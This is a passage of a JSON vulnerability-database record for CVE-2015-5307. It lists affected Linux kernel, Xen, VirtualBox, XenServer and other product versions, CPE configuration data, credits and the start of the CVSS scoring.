        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.65"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.7"
      },
      {
        "model": "junos space 16.1r1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.4.4"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.42"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.30"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.3.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.9"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.41"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "14.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.18"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.4"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.58"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.10"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "13.1"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.35"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.1"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.2"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.0.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.12"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.30"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.6"
      },
      {
        "model": "linux enterprise server sp4 ltss",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.6"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.13"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "6.0.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.5"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.0.2"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.35"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.72"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.7"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.2.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.52"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1.8"
      },
      {
        "model": "vm virtualbox",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.14"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.1"
      },
      {
        "model": "xenserver fp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.4"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.38"
      },
      {
        "model": "xenserver sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.6"
      },
      {
        "model": "vm virtualbox",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8"
      },
      {
        "model": "vm server for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x863.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.86"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.18"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.1.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.2"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.9"
      },
      {
        "model": "northstar controller application service pack",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "2.1.01"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19.3"
      },
      {
        "model": "junos space 14.1r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.6"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.58"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.72"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.2.1"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.37"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0"
      },
      {
        "model": "vm virtualbox 4.2.0-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "oracle",
        "version": null
      },
      {
        "model": "windows for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "100"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.3"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "xenserver update",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.02"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.8"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.17"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.2.1"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "1.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.28"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.7"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "6.5"
      },
      {
        "model": "xenserver update1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.5"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.69"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.45"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.42"
      },
      {
        "model": "northstar controller application",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "2.1.0"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.6"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.36"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.98"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "11.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.35"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.6"
      },
      {
        "model": "xenserver update",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.03"
      },
      {
        "model": "vm server for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x863.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "15.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.7"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "77528"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-5307"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.2.3",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.3.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.5.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.6.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.3.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.6.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.3.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.6.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.5.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.4.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.4.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.4.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.6.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.5.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.6.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.3.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.5.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.4.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.3.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:oracle:vm_virtualbox:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.0.34",
                "versionStartIncluding": "4.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:vm_virtualbox:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.1.42",
                "versionStartIncluding": "4.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:vm_virtualbox:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.2.34",
                "versionStartIncluding": "4.2.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:vm_virtualbox:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.3.29",
                "versionStartIncluding": "4.3.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:vm_virtualbox:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.0.8",
                "versionStartIncluding": "5.0.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-5307"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "135227"
      },
      {
        "db": "PACKETSTORM",
        "id": "134716"
      },
      {
        "db": "PACKETSTORM",
        "id": "134828"
      },
      {
        "db": "PACKETSTORM",
        "id": "135286"
      },
      {
        "db": "PACKETSTORM",
        "id": "134701"
      }
    ],
    "trust": 0.5
  },
  "cve": "CVE-2015-5307",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 4.9,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "COMPLETE",
            "baseScore": 4.9,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2015-5307",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "MEDIUM",
            "trust": 0.1,
